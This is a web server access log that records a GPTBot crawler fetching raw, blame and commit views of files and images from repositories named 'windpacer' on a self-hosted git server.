[Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" +[17/Feb/2026:14:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" +[17/Feb/2026:14:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" +[17/Feb/2026:14:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 18783] [Gzip 9.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" +[17/Feb/2026:14:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" +[17/Feb/2026:14:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 12477] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" +[17/Feb/2026:14:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 74.7.227.38] [Length 12478] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" +[17/Feb/2026:14:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 18813] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" +[17/Feb/2026:14:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12272] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12573] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" +[17/Feb/2026:14:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10852] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" +[17/Feb/2026:14:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10852] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" +[17/Feb/2026:14:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10851] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" +[17/Feb/2026:14:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10851] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" +[17/Feb/2026:14:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10849] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" +[17/Feb/2026:14:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10852] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" +[17/Feb/2026:14:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 18604] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:14:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 57051] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:14:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" +[17/Feb/2026:14:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10818] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" +[17/Feb/2026:14:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10702] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" +[17/Feb/2026:14:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641753] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508465] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699374] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498816] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692377] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:14:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429929] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10697] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" +[17/Feb/2026:14:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:14:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 317774] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" +[17/Feb/2026:14:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fDockerfile" [Client 74.7.227.38] [Length 25431] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" +[17/Feb/2026:14:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=docker-compose.yml" [Client 74.7.227.38] [Length 24679] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:14:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:14:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" +[17/Feb/2026:14:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" +[17/Feb/2026:14:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" +[17/Feb/2026:14:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 